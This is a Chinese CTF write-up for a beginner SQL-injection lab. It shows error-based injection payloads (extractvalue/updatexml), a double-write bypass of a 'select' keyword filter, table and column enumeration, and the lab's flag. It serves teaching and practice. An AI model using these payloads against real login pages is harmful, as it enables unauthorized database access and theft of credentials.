[第一章 web入门]SQL注入-2

目录

1. 观察

2. 访问 

3. 报错注入

4. 爆表

5. 爆列

6. 爆值


1. 观察

感觉没啥信息,源代码也没啥,猜测可能把一些注入点藏在某个文件中

这时候注意看一下进入靶场的页面提示哦

 

访问一下页面看看有啥提示不

2. 访问 

  

查看源代码看看有啥注入点提示呗

顺着代码看下去,我们可以看到这些信息

 作为刚进门的小白,当然就照提示做下去喽

3. 报错注入

尝试报错注入,利用burp抓包

http://9fe2d88c-1030-4eee-ab08-1cf5310b2999.node4.buuoj.cn:81/login.php?tips=1

 爆库: 1' and extractvalue(1,concat(0x7e,database(),0x7e)) #

得到数据库:note

4. 爆表

 1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

 

额,别急,应该是对一些关键字进行过滤了,尝试对select进行绕过哈,你可以用大小写或者双写绕过,都是可以的,当然也有其他办法,我就不一 一说明了

1' and updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

得到表: fl4g,users

5. 爆列

1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_schema=database()),0x7e),1) #

 

 得到:flag,id,username,passwd

所以只要知道username和password就可以啦,可是这俩是在哪一个表中我不清楚,于是,我分别爆出两张表的列

1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1) #

得到flag

1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #

得到id,username,passwd

所以它们是在users表中

6. 爆值

1' and updatexml(1,concat(0x7e,(seselectlect group_concat(flag ) from (fl4g )),0x7e),1) #

 

得到flag

 n1book{login_sqli_is_nice}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值